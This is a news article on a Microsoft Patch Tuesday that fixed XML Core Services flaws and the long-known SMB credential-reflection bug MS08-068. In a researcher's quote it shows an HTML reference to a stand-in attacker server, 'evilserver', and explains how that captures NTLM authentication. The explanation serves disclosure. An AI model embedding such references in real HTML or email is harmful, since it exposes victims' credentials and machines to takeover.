Microsoft Fixes Old Along with New on Patch Tuesday

Microsoft fixes three flaws in its XML Core Services as well as a vulnerability affecting the Server Message Block Protocol for Patch Tuesday. If the SMB vulnerability rings a bell, it's because it was disclosed years ago, one security researcher says.

In a relatively quiet Patch Tuesday, Microsoft has plugged critical security holes in Microsoft XML Core Services as well as an old vulnerability affecting the Server Message Block Protocol.

The bulletin for XML Core Services, the more urgent of the two, addresses issues in XML Core Services versions 3.0, 4.0, 5.0 and 6.0 that exist across numerous platforms, including Windows 2000, XP, Vista, Windows Server 2003 and Windows Server 2008. Microsoft Office is also affected.

All of the XML Core Services vulnerabilities require that a hacker trick a user into visiting a malicious Web page. One of the bugs is a memory corruption vulnerability that exists in the way XML content is parsed, and could allow an attacker to take complete control of a vulnerable system.

There is also a cross-domain scripting issue in the way XML Core Services handles error checks for external document type definitions, and a third vulnerability due to how XML Core Services handles transfer-encoding headers. Both bugs could permit an attacker to read data from a Web page in another domain in Internet Explorer.

Microsoft has included a number of workarounds for each of the vulnerabilities for organizations that are not immediately able to apply the patch.

November's Patch Tuesday release also features a bulletin for a vulnerability in the Microsoft SMB (Server Message Block) Protocol that could allow a hacker to take control of a vulnerable system. Though Microsoft only rated it "important," Eric Schultze, CTO of Shavlik Technologies, called it the more interesting of the two.

"From what I can tell, it appears that MS08-068 is addressing a vulnerability that was first made public seven (plus) years ago," Schultze wrote in an e-mail. "The attacker sends the victim an html e-mail (or convinces them to visit their Web site) where the html code includes a reference like: <file://evilserver/picturejpg>. When the victim machine goes to view this html, it attempts to display the 'picture' jpg."

To display the file, the victim's machine needs to connect to the "evilserver" machine over NetBIOS ports, he continued. The malicious server asks the victim to authenticate to it so it can serve up the picture.jpg file. When the victim performs the NTLM challenge-response authentication process in order to connect to evilserver, the damage is done. The malicious server now has challenge-response data that it can use to reply back to the victim's computer-allowing the attacker to simply connect to the victim's computer without providing any specific password.

"I used to demonstrate this attack in classroom training events around the country," Schultze wrote. "It was very eye-opening for people to see a very easy-to-use exploit that could result in accessing anyone's computer on their network."

Those who cannot apply the patch immediately can enable SMB signing as a workaround to prevent the attacker from executing code in the context of a logged-on user. Users can also block TCP ports 139 and 445 at the firewall.